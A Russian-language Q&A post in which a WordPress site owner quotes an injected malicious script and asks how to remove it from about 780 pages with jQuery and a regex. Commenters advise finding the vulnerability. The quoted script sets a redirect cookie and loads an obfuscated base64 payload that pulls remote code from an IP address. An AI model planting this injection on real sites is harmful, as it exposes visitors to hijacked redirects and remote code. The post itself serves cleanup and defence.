# Удалить скрипт со страниц, определить Regex

Tags: jquery, регулярные-выражения

Мне нужно скрипт хакерский удалить с нескольких сотен страниц моего сайта. Вот он скрипт:

```
<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><!--/codes_iframe-->
```

У меня есть примерный код для этого, вроде остаётся только Regex определить. Никто не знает что писать сюда после этого: if(checkCondition). Вот код который у меня есть для удаления скрипта:

```
<script type="text/javascript">
    $(document).ready(function () {
        $("script").each(function () {
            if (this.innerHTML.length > 0) {
                if(checkCondition){ // use a regex to verify if right script
                   $(this).remove();
                 }

            }
        });
    });

</script>
```

Comment: Вы лутче разберитесь как он туда попал, и где появляется, и там ручками удаляйте

Comment: хакеры получили доступ к файловой системе? дело дрянь =)

Comment: Да я всё что можно удалил, сайт был заблокирован, я его разблокировал, переустановил платформу, поменял пароли, юзеров удалил плохих, ничего нового не появляется только эти коды остались, Яндекс на них ругается. Руками удалять с 780 страниц долго.

Comment: Так как он там появился? на какой CMS cайт? Нужно найти уязвимость

Comment: Скорее всего это инъекция через уязвимый js.

Comment: Это WordPress, на выходных буду обновлять плагины